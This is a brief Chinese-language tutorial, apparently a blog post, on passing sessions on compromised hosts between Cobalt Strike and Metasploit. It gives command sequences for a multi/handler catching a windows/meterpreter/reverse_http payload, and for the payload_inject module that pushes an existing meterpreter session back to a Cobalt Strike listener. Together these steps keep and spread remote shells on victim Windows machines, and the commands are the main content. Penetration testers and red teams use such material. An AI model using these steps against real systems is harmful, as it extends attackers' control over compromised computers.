Cobalt strike 向 Msf传递会话
当我们获得一个CS木马会话时,那么该怎么传递到msf呢?其实也挺简单的,再配置一个监听器,设置模块为Foreign HTTP。
配置好后在上线的主机上右击Spawn(增加会话),选择Foreign HTTP监听模块,这时候msf监听那边就会接收到会话
配置MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.1
set lport 2020
run
Msf派生shell给Cobaltstrike
这里还是新建一个监听器,设置模块为beacon HTTP
接下来把kali上获得的meterpreter会话转发到cobaltstrike主机上,这里我们需要用到一个exploit模块:
exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.0.1
set lport 8081
set session 4
run
这时候返回客户端可以发现已经返回一个名为CS的会话
最后来听首歌放松一下